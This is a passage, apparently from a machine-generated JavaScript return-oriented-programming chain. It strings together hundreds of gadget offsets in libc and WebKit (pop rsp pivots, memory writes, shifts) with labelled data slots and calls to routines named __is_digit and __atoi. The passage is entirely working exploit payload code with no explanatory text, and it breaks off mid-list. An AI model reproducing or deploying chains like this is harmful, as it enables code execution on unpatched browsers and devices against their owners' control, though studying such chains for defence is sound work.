ropchain+358056, //L7321+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+358048, //L7321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7321:
db([0, 0]); // 0x0
set_gadgets([
ropchain+358072, //L7321+24
ropchain+368160, //L7316
libc_base+764760, //pop rsi
ropchain+358112, //L7322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7322:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7324:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+358232, //L7327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+358216, //L7325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7325:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7327:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+358408, //L7330
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+358424, //L7331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+358376, //L7328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+358392, //L7329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7328:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7329:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7330:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7331:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+358520, //L7333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+358504, //L7332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7332:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7333:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7334:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7335:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L7336:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+358720, //L7338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7338:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+358776, //L7339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7339:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+358912, //L7343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+358896, //L7342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7341:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7342:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7343:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+358976, //L7344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7344:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7346:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L7348:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+359136, //L7351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+359120, //L7349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7349:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7351:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+359280, //L7354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+359248, //L7352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+359264, //L7353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7352:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7353:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7354:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+359368, //L7356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L7355:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L7356:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+359424, //L7357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7357:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7359:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+359504, //L7361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7361:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+359584, //L7362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7362:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7364:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+359704, //L7367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+359688, //L7365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7365:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7367:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+359784, //L7368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+359800, //L7369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7368:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7369:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+359960, //L7373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+359928, //L7371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+359944, //L7372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7370:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7371:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7372:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7373:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+360016, //L7375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7375:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+360144, //L7377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+360160, //L7378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+360128, //L7376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7376:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7377:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7378:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+360320, //L7382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+360288, //L7380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+360304, //L7381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7379:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7380:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7381:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7382:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+360376, //L7384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7384:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+360504, //L7386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+360520, //L7387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+360488, //L7385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7385:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7386:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7387:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+360680, //L7391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+360648, //L7389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+360664, //L7390
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7388:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7389:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7390:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7391:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+360736, //L7393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7393:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+360864, //L7395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+360880, //L7396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+360848, //L7394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7394:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7395:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7396:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+360960, //L7397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+360976, //L7398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7397:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7398:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+361072, //L7400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+361056, //L7399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7400:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L7402:
ropchain+361176, //L7401
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+180736, //__is_digit
//L7401:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+361304, //L7405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+361288, //L7404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7403:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7405:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+361360, //L7407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7407:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+361488, //L7409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+361504, //L7410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+361472, //L7408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7408:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7409:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7410:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+361616, //L7412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+361664, //L7415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+361632, //L7413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7412:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7413:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7414:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7415:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+361776, //L7416+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+361768, //L7416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7416:
db([0, 0]); // 0x0
set_gadgets([
ropchain+361792, //L7416+24
ropchain+362256, //L7411
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+361848, //L7418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L7417:
db([40, 0]); // 0x28
set_gadget(libc_base+759608,); //pop rax
//L7418:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L7420:
ropchain+361960, //L7419
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+185320, //__atoi
//L7419:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+362088, //L7423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+362072, //L7422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7421:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7422:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7423:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+362152, //L7424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7424:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7426:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+362232, //L7428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7428:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+368160, //L7427
//L7411:
libc_base+764760, //pop rsi
ropchain+362296, //L7430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7430:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7432:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+362416, //L7435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+362400, //L7433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7433:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7435:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+362496, //L7436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+362512, //L7437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7436:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7437:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+362672, //L7441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+362640, //L7439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+362656, //L7440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7438:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7439:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7440:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7441:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+362728, //L7443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7443:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+362856, //L7445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+362872, //L7446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+362840, //L7444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7444:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7445:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7446:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+363032, //L7450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+363000, //L7448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+363016, //L7449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7447:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7448:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7449:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7450:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+363088, //L7452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7452:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+363216, //L7454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+363232, //L7455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+363200, //L7453
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7453:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7454:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7455:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+363392, //L7459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+363360, //L7457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+363376, //L7458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7456:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7457:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7458:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7459:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+363448, //L7461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7461:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+363576, //L7463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+363592, //L7464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+363560, //L7462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7462:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7463:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7464:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+363672, //L7465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+363688, //L7466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7465:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7466:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+363784, //L7468
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+363768, //L7467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7467:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7468:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+363864, //L7469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7469:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7470:
db([42, 0]); // 0x2a
set_gadget(libc_base+144605,); //pop rdi
//L7471:
db([42, 0]); // 0x2a
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+364008, //L7472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+364040, //L7474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+364024, //L7473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
